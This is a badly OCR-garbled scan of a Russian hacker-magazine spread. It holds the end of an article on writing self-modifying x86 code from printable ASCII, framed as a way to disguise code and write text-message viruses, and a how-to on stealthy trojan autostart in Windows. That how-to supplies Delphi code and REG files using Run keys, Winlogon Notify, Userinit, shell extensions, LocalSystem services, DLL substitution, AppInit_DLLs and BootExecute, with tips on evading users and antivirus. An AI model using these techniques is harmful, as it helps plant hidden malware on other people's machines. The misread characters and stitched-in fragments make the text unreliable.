зиЬ 


ах, 0292А 


0000000С: 20 2А 29 


зиЬ 


ах, 0292А 



0000000Р: 20 2А 29 


зиЬ 


ах, 0292А 


00000012:48 


бес 


ах 


00000013:48 


бес 


ах 


00000014:48 


бес 


ах 


00000015:48 


бес 


ах 



А в текстовом виде: "-*)-*)-*)-*)-*)-*)НННН". Для проверки работоспособ- 
ности программы, запустим ее под отладчиком. 

Смотрим и... ура! Получилось! Регистр АН послушно обратился в 09Гі и ни 
одного АЗСІІ символа при этом не пострадало. Впрочем, это не единствен- 
ный и к тому же не самый короткий вариант. Можно, например, подтянуть 
регистр АІ_ к 09Гі (в этом нам помогут команды ІЫС АХ), а затем переслать 
АІ_ в АН. Стоп! Ведь команд пересылки у нас нет! Ни МОѴ, ни ХСНО не ра- 
ботают! Однако в нашем распоряжении есть стек! А стек это могучая вещь! 
Команда РІІЗН гедіб забрасывает 16-разрядный регистр на верхушку, а 
РОР гедіб стаскивает его оттуда. Команд для работы с 8-разярдными ре- 
гистрами нет, а это значит, что АІ_ и АН мы никак не обменяем, во всяком 
случае если действовать в лобовую. Нет, тут нужен совсем другой подход! 
Что такое машинное слово? Совокупность двух байт, так? Причем, млад- 
ший байт лежит по меньшему адресу, а за ним следует старший. Немного 
медитации и решение найдено. Если заслать в стек регистр АХ, затем 
уменьшить указатель верхушки стека на единицу и извлечь регистр АХ, то 
в АІ_ попадет мусор, а в АН — младший байт оригинального регистра АХ, 
в результате чего наша задача будет решена! Весь код угадывается в ОВГі 
байт, что на ОАГі байт короче, чем в прошлый раз. Это стоило бы отметить! 

[подготовка регистра АН в работе (улучшенный вариант)] 



00000000: 40 


іпс 


ах 


00000001:40 


іпс 


ах 


00000002: 40 


іпс 


ах 


00000003: 40 


іпс 


ах 


00000004: 40 


іпс 


ах 


00000005: 40 


іпс 


ах 


00000006: 40 


іпс 


ах 


00000007: 40 


іпс 


ах 


00000008: 40 


іпс 


ах 


00000009: 50 


ризЬ 


ах 


0000000А: 4С 


бес 


зр 


0000000В: 58 


рор 


ах 



С регистром ЭХ мы разделываемся аналогичным образом (многок- 
ратным вычитанием), а вот с ІІЧТ 21 Гі (СЭГі 21 Гі) все обстоит значи- 
тельно сложнее — без самомодифицирующегося кода здесь просто 
никак. На этот случай в нашем арсенале есть, по меньшей мере, две 
команды для работы с памятью: зиЬ Ьу1е:[іпсІех_гед16],гед8 и зиЬ 
Ьу1е:[ВР+іт8],гед8. 

Естественно, нам необходимо знать смещение инструкции ІЫТ 21 Гі в ма- 
шинном коде, а на данном этапе оно еще не известно, так как перед ним 
располагается самомодифицирующийся код, длину которого мы еще не 
готовы назвать. Хорошо, условимся считать, что ІЫТ 21Гі располагается 
по смещению 66Гі от начала файла, что соответствует ІббГі в памяти 
(базовый адрес загрузки для сот-файлов равен ІООГі). 

Начальное значение регистра 31 равно ІООГі, что существенно упроща- 
ет нашу задачу. Остается разобраться с ІЫТ 21 Гі (СЭГі 21 Гі). Если зако- 
дировать эту команду как 23Гі 21, а затем отнять от нее 56Гі, мы добь- 
емся того, что так долго искали. В машинном представлении это мо- 
жет выглядеть так: 



[формирование инструкции ІІМТ 21 И 
с помощью самомодифицирующегося кода] 



00000000: 56 


ризЬ 


зі 


00000001:50 


рор 


Ьр 


00000002: 6А 56 


ризЬ 


056 


00000004: 59 


рор 


сх 


00000005: 28 4Е 66 


зиЬ 


[Ьр][00066],сІ 


00000066: 23 21 







Этому соответствует следующая текстовая строка: "Ѵ]іѴѴ(М{...#!". Не 
слишком литературно, конечно, но зато целиком из печатных символов! 
Команда ВЕТЫ с опкодом СЗГі укрощается аналогично. 

Короче говоря, первый этап ручного ассемблирования можно счи- 
тать пройденным. Как и все готовые решения, он скрывает весь на- 
кал страстей и не передает треска мозговых извилин. Это только с 
виду кажется, что задачка решается просто. На самом деле, она тре- 



і \лтоіиілиеЛлчн-мікш сш 



І1І1ІЮ5 Іиесі Ісс 



ПН 0900 

шпш 



СН ПОРТ 
0К 1870 



1)8:51 

СЗОІ 



1870:0100 

1870:РРРЕ 



Сй : ТР 1870:01 Ій 
33:ЗР І07О:РРРС 



ВР тъ 
рі эгос 



1070 



555.040 



(ШТТЙ7ПРС 

001000010 



187О0Ш 
І87О0ІЙЭ 
1870:0100 
1870:0109 
1870:0100 
І87П0І0Е 
1370:0112 
1870:01 Ій 
1370:0114 
1870:01 15 



20 20 29 
?0 ?П 29 
20 2Й 29 
21) 2Й 29 
20 20 29 
?0 2Й 29 



40 

48 

40 

1*1 



зио 

800 

5Ш 

8ио 

5110 
81)0 
ОЕХ 
0РС 
ВЕС 
ЦП 



ОМ, 2920 
ПН. 2920 
ОН, 2920 
ПН, 2920 
ОК. 292В 
ПК, 2920 
ОН 

он 

он 

Ш!^Н 



й I ІІСІС 

00 1370] 
-йь он а 
04 1070 

о? 3206 
00 0000 
0? 20СГ> 
04 9РРР 
Ой 9000 
03 РЕР0 
00 РОШ 
ОС ІЖЙ 
0Р 0500 



18700100 
1370:0110 
18700120 
1870:0100 
18700140 
1870:0150 
1870:0160 
1870:01 70 
18 70018 0 

паяние 



?0 

20 

90 

90 

90 

90 

90 

90 

90 



20 29 2С 
29 43 43 
90 90 90 
90 90 90 
90 90 90 
90 90 90 
90 90 
90 90 
90 90 



90 

90 

90 



2П 

43 

90 

90 

90 

90 

90 

90 

90 



29 20 20 
43 90 90 
90 90 90 
90 90 90 
90 90 90 
90 90 90 
90 90 90 
90 90 90 
911 911 9іІ 



29 ?П 20 
90 90 90 
90 90 90 
90 90 90 
90 90 90 
90 90 90 
90 90 90 
90 90 90 
90 90 90 



29 

90 

90 

90 

90 

90 

90 

90 

90 



20 20 
90 90 
90 90 
90 90 
90 90 
90 90 
90 90 
90 90 
90 90 



29 20 
90 90 
90 90 
90 90 
90 90 
90 90 
90 90 
90 90 
90 90 



піп5( 



ІККРНШ-Л 



I. іпк 



ІН/ІЯЯГОІ 



-) -) "1 -) 



ШІІІІРРРРРРРРРР 

РРРРРРРРРРРРРРРП 

рррррррррррррррН 

рррррррррррррррр 
РРРРРРРРРРРРРРРЙ 
ррррррррррррррр[^ 
РРРРРРРРРРРРРРРИ 
рр ррррррр рр ррррр 
■II ИМ 



проверка работоспособности фрагментов программы под отладчиком 




строка "НЕ1_1_О,\Л/ОВи0!$" и ее машинное представление 



бует нестандартного мышления, хорошего значения структуры ма- 
шинных команд, медитации и длительных размышлений, пытающих- 
ся втиснуть заданную функциональность в ограниченный диапазон 
читабельных байт. Впрочем, это всего лишь начало. Настоящее ве- 
селье наступает потом, когда хакер пытается превратить читабель- 
ный текст в осмысленную фразу. Очевидно, что наш первоначальный 
вариант (абракадабра в стиле ,, -*)-*)-*)-*)-*)-*)НННН...Ѵ]]ѴУ(М1...#!") 
ничем подобным не является. 

Приходится разлагать числа на слагаемые так, чтобы эти сами 
слагаемые представляли осмысленные комбинации букв, разбав- 
ляемые машинными командами из первой группы (см. таблицу), 
для ликвидации подобных эффектов от которых использовать про- 
тивоположные им команды. В конечном счете образуется какая-то 
дикая текстовая строка, с кучей посторонних символов, но зато ра- 
ботающая!!! Чтобы не обламывать кайф, никаких законченных ре- 
шений здесь я приводить не буду. Первую строку создать всегда 
трудно. Главное — понять идею, общий принцип. В готовом виде 
все выглядит скучно и неинтересно. 

На первых порах, можно смягчить условия и расширить доступный 
алфавит русскими буквами и символами псевдографики, а затем, 
по мере накопление опыта, его постепенно ужесточать. Матерые ха- 
керы, напротив, ограничиваются только заглавными английскими 



буквами и к тому же соревнуют- 
ся одновременно по размеру ко- 
да (в байтах), скорости его вы- 
полнения (в тактах старого доб- 
рого 8086) и времени решения 
задачи (в часах с точностью до 
минуты). До международных со- 
ревнований дело, конечно, не 
доходит, но в локальных схват- 
ках кровь кипит только так. 

[заключение] Когда я говорил, 
что составление таких строк не 
имеет никакого практического 
значения, я слегка привирал. 
Ведь это замечательный защит- 
ный трюк, сбивающий хакеров с 
толку. Если фрагмент программы 
выглядит, как строка, и передача 
управления на него тщательно 
замаскирована, далеко не каж- 
дый хакер с лету разберется что к 
чему. Как вариант, машинные 
текстовые строки можно использовать как серийные номера, рас- 
шифровывающие программу или добавляющие к ней недостающую 
функциональность (естественно, перед запуском на выполнение не- 
обходимо проверить их СВС, вдруг пользователь ошибся при вводе). 
Еще интереснее написать МЗ-ЭОЗ вирус, представляющий собой 
текстовое послание. В общем, как говорится, главное фантазию 
иметь, а области применения найдутся @ 



символ 


команда 


опкод 


$ 


АІ\Ю АІ_,іт8 


24іі 


% 


АІ\Ю АХ, ітіб 


25іі 


4 


ХОК АІ_, іт8 


34іі 


5 


ХОРАХ, ітіб 


35І1 


. 


80В АІ_, іт8 


2СІ1 


- 


80В АХ, ітіб 


20іі 


< 


СМР АІ_, іт8 


2СФ 


= 


СМР АХ, ітіб 


ЗЭІі 


двух и трех байтовые команды второй группы 
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ЕХЮХРЕРТ 



ДОМАШНИЙ ^НнОТ-СаТр ДйЁТ УОІМОЙНМТЪ 

не вьгаюдн и? дома видеть., слышать, 
чув-с твоват ь красоту мира, 

‘■РѴО Эксперт^ прм 0 г«т 
нмйрать лучшую текинку 
для домашнего кинотеатра. 



В сентябре встречайте обновленный 

РѴР Эксперт! 
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Методы автозапуска 

СУЩЕСТВУЕТ МНОЖЕСТВО СПОСОБОВ ОРГА- 
НИЗОВАТЬ ЗАПУСК ТРОЯНА ПРИ СТАРТЕ СИС- 
ТЕМЫ, НЕКОТОРЫЕ ИЗ НИХ ДАВНО ЗАЮЗАНЫ 
ДО ДЫР, А НЕКОТОРЫЕ ИСПОЛЬЗУЮТСЯ 
ОЧЕНЬ РЕДКО И ПРАКТИЧЕСКИ НИЧЕМ НЕ ОБ- 
НАРУЖИВАЮТСЯ. ЕСЛИ ХАКЕР БУДЕТ ПОДХО- 
ДИТЬ К СОЗДАНИЮ СВОЕГО ТРОЯНСКОГО КО- 
НЯ С УМОМ, ОН НИ ЗА ЧТО НА СВЕТЕ НЕ БУ- 
ДЕТ ИСПОЛЬЗОВАТЬ ДРЕВНИЕ И ВСЕМ ИЗВЕ- 
СТНЫЕ МЕТОДЫ, ОН ИЛИ ПРИДУМАЕТ ЧТО-ТО 
СВОЕ, ИЛИ ВОЗЬМЕТ КАКОЙ-НИБУДЬ НОВЫЙ, 
ДОСЕЛЕ ПРИВАТНЫЙ, НУ, ИЛИ НЕ ОЧЕНЬ 
РАСПРОСТРАНЕННЫЙ СПОСОБ. ДАВАЙ ПОС- 
МОТРИМ, КАКОЙ ВЫБОР ПРЕДСТОИТ СДЕ- 
ЛАТЬ ХАКЕРУ I Мз-Вет (Мз-Вет@уапсІех.ги) 



Разбираемся с реализацией 
автозагрузки в ВАТ 

[старинные методы] Начнем со старинных, давно всем изве- 
стных и широко применяемых методов. Это, конечно, запись яр- 
іо лыка в папку «Автозагрузка» и создание параметров в разделах 

| реестра НКЕУ_СІІВВЕМТ_ІІЗЕВ\5оІІѵѵаге\МісгозоІі\ѴѴіпсІоѵѵз\ 

2 СигтепП/егзіоп\Вип и КЕУ_ЮСАІ_МАСНІМЕ\ЗОРТѴѴАВЕ\Місгозот 



ѴѴіпбоѵѵз\СиггепІѴегзіоп\Вип. Первый метод, как ты понимаешь, абсолютно 
непригоден для использования в трояне. Его не станет никто реализовы- 
вать только потому, что детектирование подобного метода — это пара кли- 
ков, Пуск->Программы->Автозагрузка. Метод же с реестром, едва ли не са- 
мый распространенный из всех, так как применяется в троянах, начиная с 
самого момента их появления. Приведенные чуть выше разделы, содержат 
списки файлов, которые Ехріогег запускает после своей загрузки. Первый 
— список для конкретного пользователя, а второй — уже для всех пользо- 
вателей в системе, по этой причине для добавления записи в него понадо- 
бятся права администратора или хотя бы опытного пользователя. Добавить 
свой параметр нетрудно, если использовать объект ТВедізІгу, однако хакер 
борется за наименьший размер своих программ, поэтому применяет иск- 
лючительно чистый АРІ. Запись файла в список автозапуска Ехріогег'а у не- 
го может выглядеть так: 

Ргосесіиге ІпзІаІІТгоіап; 
ѵаг 

Кеу: Ькеу; 

Т^ате: РСЬаг; 

31: ТЗІаДирІпІо; 

Рг: ТРгосеззІпІогтаІіоп; 

ЗузІетРаІЬ: аггау [О..МАХ_РАТН] о! СЬаг; 

Ьедіп 

6еІЗузІетОігесІогу(Зу5ІетРаІЬ, МАХ_РАТН); 

і! РедОрепКеуЕх(НКЕУ_ШСАІ_МАСНІЫЕ, 
, ЗОРТ^Л/АВЕ\Міс^озоТ1:\V\/іпсIо^л/з\Си^^еп1;Vе^зіоп\Вип , , О, 

КЕѴ_С В Е АТЕ_3 II В_КЕѴ ог КЕѴ_ЗЕГ_ѴАШЕ, Кеу) = ЕВВОВ_ЗІІССЕЗЗ ІЬеп 

Ьедіп 

ВедЗеІѴаІиеЕх(Кеу, Кеу№те, О, ВЕ6_32, Ехе№те, 
Із1:гІеп(ЕхеЫате) + 1); 

ВедСІозеКеу(Кеу); 

епф 

епф 

КеуЫате в этом коде — имя создаваемого ключа, а ЕхеЫате — путь к 
загружаемому файлу. Про этот метод автозагрузки знает даже самый 
тупой юзер, да и антивирусы давно уже научились мониторить Вип в ре- 
естре и предупреждать пользователя о новых загружаемых файлах. Ко- 
нечно, можно не добавлять свой пункт в список, а изменить уже сущест- 
вующий, вероятно, это вызовет чуть меньше подозрений у пользовате- 
ля, но от антивируса, предупреждающего обо всех изменениях, не спа- 
сет. Поэтому, если и использовать этот метод, то в прикладных програм- 
мах — о троянах с ним хакеру лучше забыть. 

[запуск из-под ѴѴіпІодоп] Если начать искать более незаметные 
методы автозагрузки в реестре, то выясняется, что их превеликое 
множество. Для начала рассмотрим раздел НКЕѴ_І_ОСАІ__МАСНІМЕ\ 



"такой СІ-Зіиѵ идентификатор одноз^- 

г I — уникальный 12 » оиш оМ _ о 6 ьек та. СОМ ооь 

начно определяющий инте 0 рфеис сп0ртирующую необыч- 
ные П фуакЩМ^^®^^^ т0, 

Числ0 В ФИГУР ' 

(00000000-0000^000 уникальным. входя щей 



На диске как обычно ты 
сможешь откопать все 

сорцы к статье. На диске 

к журналу, конечно. На ка- 
ком-нибудь левом, куплен- 
ном на радиорынке, ты 



• На диска как ,м ^ ■— ЗОРТѴѴАВЕ\МісгозоЛ\ѴѴіпсіоѵѵ5 
сможешь откопать все МТ\СипБПІѴегзіоп\ѴѴіпІодоп\І\ІоМу, в 

топы к статье. На диске котором хранятся списки ОІ_І_, подг- 
ружаемых процессом ѵѵіпіодоп.ехе 
при наступлении определенных со- 
бытий в системе. Неплохим методом 

всего этого не обнаружишь. автозапуска является запись в этот 

раздел реестра собственной ОІ_І_. 
Один из его плюсов то, что наша ОІ_І_ может быть запущена от процесса 
Зузіет при старте системы. При этом хакер получает полный доступ к 
системе, но, правда, лишается доступа к шифрованным файлам пользо- 
вателя (на ІМТРЗ). Обойти это ограничение он может с помощью запуска 
ОН при входе пользователя в систему (с включенной имперсонацией), 
либо сделав инжект в пользовательский процесс. Также хакеру, вероят- 
но, будет полезно то, что есть возможность определить несколько функ- 
ций в одной ОІ_І_, которые будут вызываться при разных системных собы- 
тиях, к примеру, при старте системы и при входе пользователя в систему. 
Итак, для запуска своей ОІ_І_ нам необходимо создать в ѴѴіпІодопМЧоіііу 
раздел с произвольным именем. Обязательными параметрами этого раз- 
дела будут являться АзупсИгопоиз, ОНИате, Ітрегзопаіе и один или нес- 
колько параметров, отвечающих за событие , при котором ОІ_І_ будет заг- 
ружена. Параметр АзупсИгопоиз (ВЕѲ_ОѴѴОРЮ) определяет тип вызова 
функций из ОІ_І_. При значении 0 функции будут вызываться из основного 
потока процесса ѵѵіпіодоп.ехе, и загрузка системы не сможет быть продол- 
жена до тех пор, пока функция не вернет управление. При значении 1 
функция будет вызвана асинхронно, в отдельном потоке, а, следователь- 
но, она сможет никогда не возвращать управление системе. Параметр 
□ІІІМате определяет путь к загружаемой ОН. Если ОН находится в сис- 
темной папке, то можно прописать только ее имя. Параметр Ітрегзопаіе 
определяет права доступа потока, в котором будет вызвана наша функ- 
ция. При значении 0 поток получит права системы, а при значении 1 — 
права пользователя, с которым связано произошедшее событие. Рассмот- 
рим теперь типы событий и имена соответствующих им ключей в реестре. 



І_одоп — событие входа пользователя в систему, его применение целесооб- 
разно тогда, когда требуется выполнять действия от имени пользователя. 
І_одоЯ — выход пользователя из системы. 

ЗсгеепЗаѵег — запуск скринсейвера, следует применять тогда, когда 
нужно выполнять действия, приводящие к большой загрузке системы (а, 
следовательно, заметные пользователю). 

ЗіорЗсгеепЗаѵег — завершение работы скринсейвера. 

Зіиіісіоѵѵп — завершение работы системы, на это событие можно пове- 
сить сохранение каких-либо данных. 

ЗіаПЗИеІІ — запуск оболочки, происходит при старте ехріогег.ехе. Обрати 
внимание, это событие не эквивалентно І_одоп, так как может быть выз- 
вано несколько раз из-за рестарта оболочки при возникающих сбоях. 
РозІЗІіеІІ — событие, возникающее после запуска оболочки. 

Зіагіир — старт системы, наверняка хакер будет использовать именно 
это событие для загрузки трояна. Следует заметить, функция повешен- 
ная на это событие, будет всегда вызываться от имени системы, неза- 
висимо от значения параметра Ітрегзопаіе. 

І_оск — событие блокировки рабочей станции, оно возникает при смене 
пользователя без выхода из системы, либо при блокировке с помощью 
клавиш ѴѴіп+І_ (ѴѴіпсІоѵѵз ХР). 

ІІпІоск — разблокировка рабочей станции, либо переключение на дру- 
гого залогиненного в системе пользователя. 

Оізсоппесі — отключение рабочей станции от домена. 

Весоппесі — подключение рабочей станции к домену. 



Как видишь, набор событий весьма велик, и на каждое можно повесить свой 
обработчик. Это позволит отслеживать действия пользователя и выбирать 
наиболее удачный момент для запуска той или иной функции трояна. 



Вот, к примеру, исходный код ЭІ_І_, запускающей поіерасі.ехе от имени 
Зузіет при входе пользователя в систему: 

ІіЬгагу Вип; 

и$ез 

ѵѵіпсіоѵѵз; 

ргосесіиге ЕхесиІеІ\ІоІерасІ(); 
ѵаг 

31: ТЗІаДиріпІо; 

Рг: ТРгосеззІпІогтаІіоп; 

Ьедіп 

2егоМетогу(@31, Зіге0Т(81:)); 

ЗІсЬ := ЗІ2еОІ(31); 

ЗІІрйезкІор := РС^^а^( , ѵѵіп5^аО\сIеIаиIі , ); 

СгеаІеРгосезз(піІ, 'по^ераФехе 1 , піі, піі, Таізе, 0, піі, піі, 31, Рг); 
епф 

ехрогіз 

ЕхесиІеМоІерасІ; 

Ьедіп 

епсі. 

Эта ЭИ содержит только одну функцию — ЕхесиіеІМоІерасІ, которая ве- 
шается на событие І_одоп. Для установки надо скопировать эту ЭІ_І_ в 
папку \ѵѵіпсІоѵѵз\зузіет32 и выполнить ВЕО-файл следующего содержа- 
ния (думаю, содержимое этого файла будет тебе понятно и без моих 
комментариев): 

ѴѴіпсІоѵѵз Ведізігу ЕсМог Ѵегзіоп 5.00 

[НКЕѴ_І_0САІ__МАСНІІ\І Е\ЗОРТѴѴАВЕ\МісгозоІІ\ѴѴіп(1оѵѵ5 

ЫТЛСиггеп1:Ѵег5іоп\ѴѴіпІодоп\Ыо1:іТу\Рип] 

"АзупсЬгопоиз"=сІѵѵогсі:00000001 

"Ітрегзопа1е"=с1ѵѵогсі:00000000 

"0ІІІ\Іате"="гип.сІИ" 

"І_одоп"="ЕхесіЛеІ\ІоІерасГ 

Недостаток этого метода в том, что раздел реестра, куда прописыва- 
ется троян, документирован в М5ЭІЧ, а, следовательно, некоторые 
пользователи могут его иногда проверять. Однако не смотря ни на 
что, метод работает в 99% случаев и показал себя достаточно надеж- 
ным для использования в ВАТ. 

Для того, чтобы скрыть автозагрузку еще лучше, хакеру стоит обратить 
внимание на раздел реестра НКЕѴ_І_ОСАІ__МАСНІІ\ІЕ\ 
ЗОРТѴѴАВЕ\Місгозоіі\ѴѴіпсіоѵѵ5 МТ\СиггепІѴегзіоп\ѴѴіпІодоп\(ЗРЕхІеп5іоп5. 
В нем хранятся списки ЭІ_І_, загружаемых винлогоном при обработке 
групповой политики безопасности. В этот раздел также можно устано- 
вить трояна, но проблема в том, что настройки политики безопасности 
пользователи меняют редко, и, маловероятно, что этот автозапуск вооб- 
ще когда-нибудь сработает ;). Как добавить туда свою ЭИ очень прос- 
то понять, посмотрев на уже существующие там записи. 

Но и это, как говориться, еще не все. В ѴѴіпІодоп'е огромная куча мест, от- 
куда реально стартануть трояна. Смотри, разделом выше, в 
НКЕѴ_і_ОСАІ__МАСНІІ\ІЕ\ЗОРТѴѴАВЕ\Місго50Й\ѴѴіпсіоѵѵз 
М"Г\СиггепіѴегзіоп\ѴѴіпІодоп есть два замечательных параметра: ЗПеІІ и 
ІІзегіпіі. Первый обычно содержит имя файла оболочки, запускаемой пос- 
ле входа в систему (обычно ехріогег.ехе), второй — путь к приложению, ко- 
торое инициализируют профиль пользователя при входе в систему (обыч- 
но ІІзегіпіі.ехе). Для автозагрузки можно подставить в параметр ЗПеІІ путь 
к своему трояну, который уже будет сам запускать оболочку. Но это не луч- 
ший способ. Гораздо больше возможностей предоставляет параметр 
ІІзегіпіі. Основная его фича в том, что с его помощью можно запустить не 
одно, а сразу несколько приложений — достаточно просто разделить их 
запятыми. На практике это может выглядеть так: ІІзегіпіі = ІІзегіпіі.ехе, іго- 
Іап.ехе. Такая штука будет замечательно работать! 

Также хакеру могут пригодиться параметры ІІІНозі и ѴтАррІеІ. Первый 
хранит имя приложения, отображающего заставку входа в ѴѴіпсІоѵѵз 
(только в ХР), второй — имя библиотеки АсііѵеХ СопігоІ, запускаемой 
при открытии панели управления. Логично, что и эти параметры можно 
вполне безболезненно подменить. 

[Ехріогег 8ГіеІІ Ехіепііопз] Как тебе известно, некоторые програм- 
мы добавляют свой пункт в контекстное меню оболочки. Ты никогда не 
задумывался, как они это делают? На самом деле все довольно прос- 
то, в ѴѴіпсІоѵѵз есть механизм Ехріогег ЗТіеІІ Ехіепііопз, который позво- 
ляет расширять практически любое меню оболочки. Для этого нужно 
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создаем место в файле 



создать свою ЭИ и прописать ее в специальном месте реестра. При 
вызове соответствующего контекстного меню эта ЭІ_І_ будет загруже- 
на и ей будет передано управление. Ничто не помешает хакеру пропи- 
сать туда троянскую Ои_, причем, даже не создавая новые пункты в 
меню — это, оказывается, не обязательно. Список таких ЭІ_І_ хранить- 
ся в разделе реестра НКЕУ_СІА35ЕЗ_ВООТ\Оігес1огу\зІіеІ- 
Іех\Соп1ехШепиНапбІегз. Для каждой ОН там создается свой подраз- 
дел, в котором параметром по умолчанию является некоторый уни- 
кальный СІ_ЗЮ. Сама ЭІ_І_ приписывается в разделе реестра 
НКЕѴ_СІ_АЗЗЕЗ_ВООТ\СІ_ЗЮ. Допустим, СІ_ЗЮ хакерской ОН будет 
ЕВЭР1 Р20-С829-9999-8233-0020АРЗЕ97А9, тогда для ее автозапуска 
надо создать раздел НКЕѴ^АЗ-ЗЕЗ_РЮОТ\СІ_ЗЮ\{ЕВЭР1 Р20-С829- 
9999-8233-0020АРЗЕ97А9}\-ІпргосЗегѵег32. Параметром по умолчанию 
должен являться путь к ЭІ_І_. Также потребуется создать параметр 
ТНгеасІіпдМосІеІ и установить его в значение АраДтепі. Следующий 
раздел, где хакеру необходимо будет прописать свою ОН, — 
НКЕУ_СІ_АЗЗЕЗ_РЮОТ\*\зІіеІІех\Соп1ехШепиНапсІІег5. Он опреде- 
ляет ЗГіеІІ Ехіепііоп, выполняемый при выпадении контекстного 
меню на любом файле. 

В итоге, для установки своего расширения контекстного меню, вернее, 
автозагрузки трояна с его помощью хакеру нужно выполнить ВЕО-файл 
следующего содержания: 

ѴѴі псіоѵѵз Ведізігу ЕсШог Ѵегзіоп 5.00 

[НКЕѴ_СІ_АЗЗЕЗ_В00Т\СІ_ЗІ0\{ЕВ0Р1 Р20-С829-9999-8233- 
0020АРЗЕ97А9}\ІпргосЗегѵег32] 

@="1го]ап.сШ" 

"ТМ геасі і п д М осі е І"=" Ар агіт е іті" 

[НКЕУ_СІАЗЗЕЗ_РЮОТ\*\зІіеІІех\СопІехШепиНапс]Іег5\СооІТгоіап] 
@="{ЕВ0Р1 Р20-С829-9999-8233-0020АРЗЕ97А9}" 

[РІКЕУ_СІАЗЗЕЗ_ВООТ\ОігесІогу\з[іеІІех\СопІехІМепиНапсІІег5\СооІТгоіап] 
@="{ЕВ0Р1 Р20-С829-9999-8233-0020АРЗЕ97А9}" 



Этот метод автозагрузки я считаю наиболее перспективным среди вышео- 
писанных. Большинство юзеров даже не подозревают о наличии каких-то 
там ЗГіеІІ Ехіепііоп, а те, кто о них знает, вряд ли смогут найти трояна среди 
большого количества записей, сделанных другими программами. Большим 
плюсом также является то, что об этом методе антивирусы не знают ниче- 
го, и при добавлении Ехіепііоп не выдают предупреждений пользователю. 

[системные службы] В ѴѴіпбоѵѵз ЫТ помимо пользовательских прило- 
жений существуют еще и системные службы. Это программы, которые за- 
пускаются до входа пользователя в систему и работают независимо от 
его действий. Естественно, и здесь найдется местечко для загрузки троя- 
на. Список установленных служб хранится в разделе реестра 
НКЕУ_ЕОСА1_МАСН1ЫЕ\ЗУЗТЕМ\СиггепГСоп1го13е1:\Земсез. Для каждой 
службы создается свой подраздел в реестре, а в нем следующие ключи: 
ОізрІауМате — имя службы, отображаемое в ММС, консоли админист- 
рирования служб. Чтобы не палить троян, хакеры пишут здесь что-ни- 
будь максимально правдоподобное. 

ЕітогСопігоі — критичность ошибок службы для работы системы. Этот 
параметр обычно устанавливается в ноль. 

ІтадеРаІІі — путь к исполнимому файлу службы. 

ОЬіесІІЧате — имя пользователя, от которого будет запущена служба. 
Интереснее всего поставить І_осаІЗуз1ет. 

Зйгі — тип запуска. Для автозапуска службы при старте системы надо установитъ 2. 
Туре — тип службы. Этот параметр отличает службы от драйверов. Для 
организации автозапуска некоторого приложения, здесь следует ука- 
зать значение 16, что будет означать, что это ѴѴіп32-служба. 

Обобщая вышесказанное можно написать ВЕО-файл, устанавливающий службу. 

ѴѴіпсІоѵѵз Ведізігу ЕсШог Ѵегзіоп 5.00 

[НКЕѴ_ШСАІ_МАСНІМЕ\5Ѵ5ТЕМ\СиггепЮотгоІ5еЛ5егѵісез\СооІТгоіап] 

"Туре"=сІ\л/огсІ:0000001 0 

"ЗІагГ=с1ѵѵогс1:00000002 

"ЕггогСопІгоІ"=сІѵѵогсі:00000000 

"ІтадеРаШ"="С:\ѴѴІМООѴѴЗ\5у5Іет32\Ігоіап.ехе" 

"0ізрІауЫате"="СооІТгоіап" 

"ОЬ]есШате"="ЕосаІЗузІет" 

После копирования файла Ігоіап.ехе в папку ѴѴІІ\ЮОѴѴЗ\зуз1ет32 и вы- 
полнения этого ВЕО-файла троян будет установлен в систему. Запущен 
он будет после следующей ее перезагрузки. 

Этот метод прост в применении и может показать весьма неплохие ре- 
зультаты. Но грамотный администратор всегда проверяет списки уста- 
новленных служб, и в этом случае, хакера могут обломать. 

[подмена и заражение файлов] Одним из наиболее незаметных для 
пользователя и администратора методов автозагрузки является замена од- 
ного из загружаемых файлов своим, с последующим запуском оригиналь- 
ного файла. Для этого хакеру нужно сначала переименовать подменяемый 
файл, а затем записать вместо него свой. Проще всего это сделать в слу- 
чае с ЕХЕ-файлами, но, по-моему, интереснее подменять ЭІ_І_. Это немно- 
го сложнее, зато такую подмену обнаружить будет куда тяжелее. Заменяю- 
щая ЭИ должна экспортировать функции с такими же именами, как и ори- 
гинальная. Проще всего реализовать подобный экспорт, описав все функ- 
ции заменяемой ЭІ_І_ как ехіегпаі. Чтобы ты мог лучше понять механизм за- 
мены, ниже я приведу пример ЭИ, которой можно подменить зсідпйу.сііі 
прописанную в НКЕУ_ЮСАІ_МАСНІМЕ\ЗОРТѴѴАПЕ\МісгозоП\ѴѴіпсІоѵѵз 
М"Г\Сиггеп1Ѵегзіоп\ѴѴіпІодоп\Мо1іІу\5СІдп1Іу, предварительно переименовав 
ее в зсідпйі.сііі. 



ПАРА МЕСТ В РЕЕСТРЕ? 

Довольно интересным параметром реестра в плане авто- 
запуска является АррІпі{_0І_І_з в 
Н КЕ Ѵ_І_ОСАІ__М АСН I N Е\ЗОРТѴѴАВЕ\МісгозоГС\ѴѴіпсІоѵѵз 
МТ\СиггепіѴег8іоп\ѴѴіпсіоѵѵз. Этот параметр хранит список 
ОІ_І_, подгружаемых к любому процессу, использующему 
изег32.сІІІ (а таких большинство). Хакеру будет очень 
кстати прописать в этот раздел троянскую ОІ_І_, если ему 
требуется, чтобы она работала одновременно во всех 
пользовательских процессах в системе. Правда, к прог- 
раммированию такой ОН следует подходить со всей 
возможной осторожностью, малейшая ошибка в ней мо- 
жет привести к падению всей системы. Еще одно заме- 
чательное место для автозагрузки — это раздел реестра 



НКЕУ_ІОСАІ_МАСНІМЕ\ЗУЗТЕМ\СопІгоІ5еІ\СопІгоІ\Зе83і 
оп Мападег, параметр ВооІЕхесіДе. В нем хранится спи- 
сок приложений выполняемых при старте системы, до 
запуска сервера подсистемы (сзгзз.ехе). Значением по 
умолчанию является аиіосііеск аіЛосІпк *. Использование 
этого раздела реестра для своих нужд осложнено тем, 
что на этой стадии загрузки системы недоступны функци 
ѴѴіп32 АРІ, и программа должна использовать ТОЛЬКО 
ІЧайѵе АРІ и не содержать в импортах ничего, кроме 
пісііі.сііі. Стандартными способами неподготовленному че- 
ловеку написать такую программу на ОеІрИі не выйдет, 
но если прочесть мою статью «ОеІрМ всемогущий», то и 
с этим проблем не возникнет. 
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редактирование файла в РЕ Тооіз 



сохраняем изменения в файле 



ІіЬгагу зсідпііу; 

ргосесіиге ѴѴІ_ЕѵепІІ_одоІІ; ехіегпаі 'зсідпЙі.сІІГ; 
ехрогіз 

ѴѴІ_ЕѵепІІ_одо{{; 

Ьедіп 

епсі. 

Эта ОІ_І_ при вызове функции ѴѴІ_Еѵеп1І_одоІІ просто передает управле- 
